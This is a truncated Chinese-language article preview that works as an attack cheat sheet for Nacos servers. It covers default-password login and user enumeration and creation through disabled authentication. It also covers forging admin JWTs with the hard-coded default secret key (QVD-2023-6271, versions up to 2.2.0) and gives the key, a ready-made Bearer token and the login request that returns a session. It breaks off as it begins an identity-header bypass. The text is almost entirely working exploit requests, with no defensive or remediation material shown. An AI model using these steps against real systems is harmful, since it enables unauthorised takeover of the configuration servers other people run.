文章预览
弱口令 默认账号密码都是 nacos 未授权访问 auth 产生原因,配置文件 nacos.core.auth.enabled = false 查看用户: http://xxx/nacos/v1/auth/users?pageNo=1 =1 添加用户: POST /nacos/v1/auth/users HTTP/1.1 username=test1 =test1 JWT QVD-2023-6271 nacos < =2.2.0 产生原因,虽然 nacos.core.auth.enabled = true ,但是未修改默认nacosKey nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789 JWT设置Header为HS256,payload中exp为较大时间戳(比如当前时间+5小时后的时间)unix时间戳转换的结果,签名就是用前面的key并且base64编码 获得登录的JSESSIONID: POST /nacos/v1/auth/users/login HTTP/1.1 Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMTM1NTEwMH0.zKH8OPXeQP6Eo7tMVPVb09Kb7RiI63ydLqUt57MOlsI username=admin =admin 拿到JSESSIONID添加到这个请求里,再请求就登录成功了 identity Nacos < = 2.2.0 产生原因,
………………………………